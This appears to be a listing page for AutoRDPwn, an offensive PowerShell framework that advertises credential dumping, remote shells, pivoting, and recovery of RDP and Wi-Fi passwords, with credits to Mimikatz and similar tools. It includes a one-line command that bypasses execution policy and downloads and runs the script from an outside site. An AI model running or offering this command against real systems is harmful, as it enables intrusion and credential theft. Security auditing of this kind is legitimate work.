This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:

    powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html